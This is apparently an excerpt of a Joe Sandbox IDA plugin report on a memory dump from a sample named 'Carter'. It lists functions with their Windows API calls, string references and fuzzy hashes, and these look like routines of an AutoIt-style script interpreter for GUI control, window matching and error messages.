GETSUBITEMCOUNT, xrefs: 00B044F7

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: 57ba86451c1617544bc3da62493b671bd7ace60942defe391f497523cea60977
Instruction ID: 9452a041ce89390b2fd2784eb88108e8a9a3c1b6c4af1d8defd8980c8e1be483
Opcode Fuzzy Hash: 57ba86451c1617544bc3da62493b671bd7ace60942defe391f497523cea60977
Instruction Fuzzy Hash: D3A180712142019FCB14FF60CA91A6AB7E5EF99314F2089A8F9569B3E2DF30EC05CB51

Function 00AF56C8 Relevance: 27.1, APIs: 18, Instructions: 124COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00AF56E1
LoadCursorW.USER32(00000000,00007F8A), ref: 00AF56EC
LoadCursorW.USER32(00000000,00007F00), ref: 00AF56F7
LoadCursorW.USER32(00000000,00007F03), ref: 00AF5702
LoadCursorW.USER32(00000000,00007F8B), ref: 00AF570D
LoadCursorW.USER32(00000000,00007F01), ref: 00AF5718
LoadCursorW.USER32(00000000,00007F81), ref: 00AF5723
LoadCursorW.USER32(00000000,00007F88), ref: 00AF572E
LoadCursorW.USER32(00000000,00007F80), ref: 00AF5739
LoadCursorW.USER32(00000000,00007F86), ref: 00AF5744
LoadCursorW.USER32(00000000,00007F83), ref: 00AF574F
LoadCursorW.USER32(00000000,00007F85), ref: 00AF575A
LoadCursorW.USER32(00000000,00007F82), ref: 00AF5765
LoadCursorW.USER32(00000000,00007F84), ref: 00AF5770
LoadCursorW.USER32(00000000,00007F04), ref: 00AF577B
LoadCursorW.USER32(00000000,00007F02), ref: 00AF5786
GetCursorInfo.USER32(?), ref: 00AF5796
GetLastError.KERNEL32(00000001,00000000), ref: 00AF57C1

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: 0533ad510c8686291dc82739bb9eb091b6c95e2b3da9bbaa6007c67e6deef583
Instruction ID: 39a98a081ee5c3bfced681aa63ec411fe6f876b22c34bf9b8e7c7842d3ebb7af
Opcode Fuzzy Hash: 0533ad510c8686291dc82739bb9eb091b6c95e2b3da9bbaa6007c67e6deef583
Instruction Fuzzy Hash: DC415470E043196ADB109FB68C49D6EFEF8EF51B50B10452FF619E7290DAB8A500CF91

Function 00ADB13A Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00ADB17B
__swprintf.LIBCMT ref: 00ADB21C
_wcscmp.LIBCMT ref: 00ADB22F
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00ADB284
_wcscmp.LIBCMT ref: 00ADB2C0
GetClassNameW.USER32(?,?,00000400), ref: 00ADB2F7
GetDlgCtrlID.USER32(?), ref: 00ADB349
GetWindowRect.USER32(?,?), ref: 00ADB37F
GetParent.USER32(?), ref: 00ADB39D
ScreenToClient.USER32(00000000), ref: 00ADB3A4
GetClassNameW.USER32(?,?,00000100), ref: 00ADB41E
_wcscmp.LIBCMT ref: 00ADB432
GetWindowTextW.USER32(?,?,00000400), ref: 00ADB458
_wcscmp.LIBCMT ref: 00ADB46C

Part of subcall function 00AA385C: _iswctype.LIBCMT ref: 00AA3864

Strings

%s%u, xrefs: 00ADB216

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: 505625edce6f5863457b02f181bf2262352d60b43d178382755ce15d0de43b7c
Instruction ID: cff761f13536394f5fc7f1903391f3ccab17b28ec8df40475093171a9d59b872
Opcode Fuzzy Hash: 505625edce6f5863457b02f181bf2262352d60b43d178382755ce15d0de43b7c
Instruction Fuzzy Hash: 3AA1BF71224206EFDB14DF24C884BEAB7A8FF44354F11861AF99AC3291DB30E955CBA1

Function 00ADBA6D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 00ADBAB1
_wcscmp.LIBCMT ref: 00ADBAC2
GetWindowTextW.USER32(00000001,?,00000400), ref: 00ADBAEA
CharUpperBuffW.USER32(?,00000000), ref: 00ADBB07
_wcscmp.LIBCMT ref: 00ADBB25
_wcsstr.LIBCMT ref: 00ADBB36
GetClassNameW.USER32(00000018,?,00000400), ref: 00ADBB6E
_wcscmp.LIBCMT ref: 00ADBB7E
GetWindowTextW.USER32(00000002,?,00000400), ref: 00ADBBA5
GetClassNameW.USER32(00000018,?,00000400), ref: 00ADBBEE
_wcscmp.LIBCMT ref: 00ADBBFE
GetClassNameW.USER32(00000010,?,00000400), ref: 00ADBC26
GetWindowRect.USER32(00000004,?), ref: 00ADBC8F

Strings

@, xrefs: 00ADBA92
ThumbnailClass, xrefs: 00ADBB79, 00ADBBF9

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: bc5afa0a477f2c8201b6e781ea6aff91fb41bb39c70ab4122c692f83f9a05fc8
Instruction ID: 51b529b0486d6a12ba6f3113301bdb4dbd66d206577128c922ffda5938632bb8
Opcode Fuzzy Hash: bc5afa0a477f2c8201b6e781ea6aff91fb41bb39c70ab4122c692f83f9a05fc8
Instruction Fuzzy Hash: A2819E7102420ADFDB00DF14C985FAA77E8FF48354F14856AFD8A8A2A6DB30DD45CB61

Function 00ADB8B6 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00ADB915

Strings

ACTIVE, xrefs: 00ADB8F0
[LAST, xrefs: 00ADB9C2
[HANDLE:, xrefs: 00ADB921
REGEXP=, xrefs: 00ADB92A
[REGEXPTITLE:, xrefs: 00ADB93D
[CLASS:, xrefs: 00ADB965
ALL, xrefs: 00ADB9A9
[ALL, xrefs: 00ADB9BB
[ACTIVE, xrefs: 00ADB902
HANDLE=, xrefs: 00ADB90E
CLASSNAME=, xrefs: 00ADB952
LAST, xrefs: 00ADB8DA

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 04f4dd4c52ef9727e7445669f2bd464def5f8294d7f60b36faec0db7ecd43e0a
Instruction ID: 28fbd33f203f3f9cdae0e5b81a3c875ca82f34e6ff75eeddbb0faf15bec36fcd
Opcode Fuzzy Hash: 04f4dd4c52ef9727e7445669f2bd464def5f8294d7f60b36faec0db7ecd43e0a
Instruction Fuzzy Hash: D831A331A44206E6DF14EBA0CE63EAD73F4AF20790F700526F592711E1EF556E04C562

Function 00ADCB97 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00ADCBAA
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00ADCBBC
SetWindowTextW.USER32(?,?), ref: 00ADCBD3
GetDlgItem.USER32(?,000003EA), ref: 00ADCBE8
SetWindowTextW.USER32(00000000,?), ref: 00ADCBEE
GetDlgItem.USER32(?,000003E9), ref: 00ADCBFE
SetWindowTextW.USER32(00000000,?), ref: 00ADCC04
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00ADCC25
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00ADCC3F
GetWindowRect.USER32(?,?), ref: 00ADCC48
SetWindowTextW.USER32(?,?), ref: 00ADCCB3
GetDesktopWindow.USER32 ref: 00ADCCB9
GetWindowRect.USER32(00000000), ref: 00ADCCC0
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00ADCD0C
GetClientRect.USER32(?,?), ref: 00ADCD19
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00ADCD3E
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00ADCD69

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 618263bac747ad876b100270daac63873609a0a9c91effbc2a8e02668bc6418b
Instruction ID: 8d336c001b84c091b881cc34cd0555672313f5568e3585e2b568052a6e22cabe
Opcode Fuzzy Hash: 618263bac747ad876b100270daac63873609a0a9c91effbc2a8e02668bc6418b
Instruction Fuzzy Hash: 9051603090070AEFDB209FA8CE85BAEBBF5FF44715F404519E686A36A0CB74E954CB50

Function 00B0A7DE Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B0A87E
DestroyWindow.USER32(00000000,?), ref: 00B0A8F8

Part of subcall function 00A91821: _memmove.LIBCMT ref: 00A9185B

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00B0A972
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00B0A994
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B0A9A7
DestroyWindow.USER32(00000000), ref: 00B0A9C9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00A80000,00000000), ref: 00B0AA00
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B0AA19
GetDesktopWindow.USER32 ref: 00B0AA32
GetWindowRect.USER32(00000000), ref: 00B0AA39
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00B0AA51
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00B0AA69

Part of subcall function 00A829AB: GetWindowLongW.USER32(?,000000EB), ref: 00A829BC

Strings

0, xrefs: 00B0A894
tooltips_class32, xrefs: 00B0A96B, 00B0A9F9

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: 9da8d01087bcd5ee2fb8949a7cc0192d768512cb0ef162ddc26c1047e2000442
Instruction ID: 40eb815d86a447cd3541e5ae9b31cb4eb52636e720373f6be0cca46fd3d4705e
Opcode Fuzzy Hash: 9da8d01087bcd5ee2fb8949a7cc0192d768512cb0ef162ddc26c1047e2000442
Instruction Fuzzy Hash: 21719871254304AFDB21DF28CC49FAA7BE5FB89300F54895DF986872A1DB70AA41CB52

Function 00B0CCA6 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00A829E2: GetWindowLongW.USER32(?,000000EB), ref: 00A829F3

DragQueryPoint.SHELL32(?,?), ref: 00B0CCCF

Part of subcall function 00B0B1A9: ClientToScreen.USER32(?,?), ref: 00B0B1D2
Part of subcall function 00B0B1A9: GetWindowRect.USER32(?,?), ref: 00B0B248
Part of subcall function 00B0B1A9: PtInRect.USER32(?,?,00B0C6BC), ref: 00B0B258

SendMessageW.USER32(?,000000B0,?,?), ref: 00B0CD38
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00B0CD43
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00B0CD66
_wcscat.LIBCMT ref: 00B0CD96
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00B0CDAD
SendMessageW.USER32(?,000000B0,?,?), ref: 00B0CDC6
SendMessageW.USER32(?,000000B1,?,?), ref: 00B0CDDD
SendMessageW.USER32(?,000000B1,?,?), ref: 00B0CDFF
DragFinish.SHELL32(?), ref: 00B0CE06
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00B0CEF9

Strings

@GUI_DRAGID, xrefs: 00B0CE71
@GUI_DROPID, xrefs: 00B0CE26
@GUI_DRAGFILE, xrefs: 00B0CEA8

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: f2df091e325f6b637e10bbeb1bba45bcd42b23a3f68a341df52c70bd31fb9eda
Instruction ID: e6d170d50f92e8664a11ae88cff43e8594ebbaf46cc44af7affe0e1ed84d2da3
Opcode Fuzzy Hash: f2df091e325f6b637e10bbeb1bba45bcd42b23a3f68a341df52c70bd31fb9eda
Instruction Fuzzy Hash: AD615972108301AFC701EF54DC85D9BBFE8EF89750F500A6EF595932A1DB70AA49CB52

Function 00AE82D5 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 378timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 00AE831A
VariantCopy.OLEAUT32(00000000,?), ref: 00AE8323
VariantClear.OLEAUT32(00000000), ref: 00AE832F
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00AE841D
__swprintf.LIBCMT ref: 00AE844D
VarR8FromDec.OLEAUT32(?,?), ref: 00AE8479
VariantInit.OLEAUT32(?), ref: 00AE852A
SysFreeString.OLEAUT32(?), ref: 00AE85BE
VariantClear.OLEAUT32(?), ref: 00AE8618
VariantClear.OLEAUT32(?), ref: 00AE8627
VariantInit.OLEAUT32(00000000), ref: 00AE8665

Strings

Default, xrefs: 00AE84DA
%4d%02d%02d%02d%02d%02d, xrefs: 00AE8447

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 3730832054-3931177956
Opcode ID: a81399a47fd8463f77d5f3e0fe5baade96bbd7e879a5b9f2e1f182912f969cd8
Instruction ID: 3c38e7e8fa04feac5b2f3c0a8426399f77af2eb9c7ba4dde494eb79b57a30320
Opcode Fuzzy Hash: a81399a47fd8463f77d5f3e0fe5baade96bbd7e879a5b9f2e1f182912f969cd8
Instruction Fuzzy Hash: C1D1E371604556EBDF20AFA6C894BAEB7B4FF05B00F248555E409AF290DF78EC40DBA1

Function 00B049CF Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00B04A61
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B04AAC

Strings

EXISTS, xrefs: 00B04B15
COLLAPSE, xrefs: 00B04AF2
GETITEMCOUNT, xrefs: 00B04B8E
SELECT, xrefs: 00B04C5D
EXPAND, xrefs: 00B04B5E
UNCHECK, xrefs: 00B04C88
CHECK, xrefs: 00B04ACC
GETSELECTED, xrefs: 00B04BBC
ISCHECKED, xrefs: 00B04C2F
GETTOTALCOUNT, xrefs: 00B04A93
GETTEXT, xrefs: 00B04BFF

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: dc74508d38a4936e7863fbfafb4e556f6e9b47f4492ca246f8836f88ac61c1a1
Instruction ID: 777f92c8f9cb109fa9700a28dc6388daa6586a727c796ef3957ef47ea404f1a9
Opcode Fuzzy Hash: dc74508d38a4936e7863fbfafb4e556f6e9b47f4492ca246f8836f88ac61c1a1
Instruction Fuzzy Hash: 92917C752047019FCB14EF20C691A6ABBE1EF98354F10889DF9965B3E2DB31ED49CB81

Function 00AEE25D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00AEE31F
SystemTimeToFileTime.KERNEL32(?,?), ref: 00AEE32F
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00AEE33B
__wsplitpath.LIBCMT ref: 00AEE399
_wcscat.LIBCMT ref: 00AEE3B1
_wcscat.LIBCMT ref: 00AEE3C3
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00AEE3D8
SetCurrentDirectoryW.KERNEL32(?), ref: 00AEE3EC
SetCurrentDirectoryW.KERNEL32(?), ref: 00AEE41E
SetCurrentDirectoryW.KERNEL32(?), ref: 00AEE43F
_wcscpy.LIBCMT ref: 00AEE44B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00AEE48A

Strings

*.*, xrefs: 00AEE445

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: d5d3c271a337c695abca5668efea5f7e505e26038a5df4be24a4566012377e98
Instruction ID: 39b4d99072d8692de0340166750a7eb4178a354c4177cd9ab68e4846bd244a7a
Opcode Fuzzy Hash: d5d3c271a337c695abca5668efea5f7e505e26038a5df4be24a4566012377e98
Instruction Fuzzy Hash: 9C6168725047859FCB10EF65C984A9EB3E8FF89310F04891EF989C7251EB35E945CB92

Function 00AEA27B Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00AEA2C2

Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00AEA2E3
__swprintf.LIBCMT ref: 00AEA33C
__swprintf.LIBCMT ref: 00AEA355
_wprintf.LIBCMT ref: 00AEA3FC
_wprintf.LIBCMT ref: 00AEA41A

Strings

Error: , xrefs: 00AEA3C4
^ ERROR , xrefs: 00AEA391
Incorrect parameters to object property !, xrefs: 00AEA39E
Line %d (File "%s"):, xrefs: 00AEA336, 00AEA34F
"%s" (%d) : ==> %s:%s%s, xrefs: 00AEA3F7
"%s" (%d) : ==> %s:, xrefs: 00AEA415

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: LoadString__swprintf_wprintf$_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 311963372-3080491070
Opcode ID: 51d8e60b76c2ee9eda58a5e00a97195303d947e64fd0ff2b82d5e6588005d82c
Instruction ID: 309d70fe4d6502b5399fc343005fe5e7c72fd03a4fd9c5e2b320d13e94422303
Opcode Fuzzy Hash: 51d8e60b76c2ee9eda58a5e00a97195303d947e64fd0ff2b82d5e6588005d82c
Instruction Fuzzy Hash: BE51A071A4011AAACF14EBE0CE46EEEB7B9AF14340F600165F505B20A2EF752F58DB61

Function 00AE0065 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000002,?,00ACF8B8,00000001,0000138C,00000001,00000002,00000001,?,00AF3FF9,00000002), ref: 00AE009A
LoadStringW.USER32(00000000,?,00ACF8B8,00000001), ref: 00AE00A3

Part of subcall function 00A91A36: _memmove.LIBCMT ref: 00A91A77

GetModuleHandleW.KERNEL32(00000000,00B47310,?,00000FFF,?,?,00ACF8B8,00000001,0000138C,00000001,00000002,00000001,?,00AF3FF9,00000002,00000001), ref: 00AE00C5
LoadStringW.USER32(00000000,?,00ACF8B8,00000001), ref: 00AE00C8
__swprintf.LIBCMT ref: 00AE0118
__swprintf.LIBCMT ref: 00AE0129
_wprintf.LIBCMT ref: 00AE01D2
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00AE01E9

Strings

Error: , xrefs: 00AE01A0
%s (%d) : ==> %s: %s %s, xrefs: 00AE01CD
Line %d:, xrefs: 00AE0123
Line %d (File "%s"):, xrefs: 00AE0112
^ ERROR, xrefs: 00AE017E

Memory Dump Source

Source File: 00000018.00000002.4498659979.0000000000A81000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000018.00000002.4498628930.0000000000A80000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498778391.0000000000B36000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498874198.0000000000B40000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000018.00000002.4498912584.0000000000B49000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a80000_Carter.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
